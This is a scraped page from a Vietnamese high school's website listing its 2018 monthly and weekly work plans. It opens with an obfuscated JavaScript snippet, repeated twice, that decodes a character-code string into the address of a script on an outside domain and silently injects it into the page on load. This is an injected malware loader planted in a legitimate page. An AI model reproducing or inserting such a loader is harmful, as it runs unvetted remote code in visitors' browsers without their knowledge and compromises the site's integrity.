var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 106, 108, 99); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);}var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 106, 108, 99); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);} Lịch công tác – Trường THPT Yên Định 2 – Thanh Hóa
15/08/2018
kế hoạch tháng

KẾ HOẠCH THÁNG 8 NĂM HỌC 2018-2019

KẾ HOẠCH CÔNG TÁC THÁNG 08 NĂM HỌC 2018- 2019 Chủ đề: Chào mừng 73 năm cách mạng tháng 8 và Quốc khánh 2/9   NHIỆM […]
31/07/2018
tbt2

LỊCH TẬP TRUNG HỌC SINH KHỐI 10 NĂM HỌC 2018-2019

Nhằm giúp học sinh mới tuyển vào lớp 10 năm học 2018-2019 định hướng Ban học và khối học, nhà trường thông báo lịch tập trung […]
14/05/2018
Ke hoach tuan moi

Kế hoạch Tuần 37 năm học 2017-2018

   Kế hoạch Tuần 37– Lớp trực 11B7 Thứ Sáng Chiều Giám hiệu trực 2 14/5 6h45′   Học Đ/c Hiệu trưởng duyệt KH năm học 2018-2019 […]
08/05/2018
Ke hoach tuan moi

Kế hoạch Tuần 36 năm học 2017-2018

   Kế hoạch Tuần 36- Lớp trực 11B6 Thứ Sáng Chiều Giám hiệu trực 2 07/5 6h45′    Thi HK K11: Toán, Địa, CD K12 học bình […]
08/05/2018
Ke hoach tuan moi

Kế hoạch Tuần 35 năm học 2017-2018

   Kế hoạch Tuần 35- Lớp trực 11B5 Thứ Sáng Chiều Giám hiệu trực 2 30/4 6h45′    Nghỉ lễ ĐC: Vũ Đình Binh 3 01/5 6h […]
27/04/2018
Ke hoach tuan moi

KẾ HOẠCH TUẦN 34 NĂM HỌC 2017-2018

   Kế hoạch Tuần 34- Lớp trực 11B4 Thứ Sáng Chiều Giám hiệu trực 2 23/4 6h45′    Học (Đ/c Binh, Hùng tham gia tập huấn tại […]
27/04/2018
kế hoạch tháng

KẾ HOẠCH CÔNG TÁC THÁNG 05 NĂM HỌC 2017- 2018

KẾ HOẠCH CÔNG TÁC THÁNG 05 NĂM HỌC 2017- 2018 (TUẦN 35-39, TỪ 30/04- 02/6/2018) Chủ đề: Chào mừng 128 năm ngày sinh Lãnh tụ Hồ […]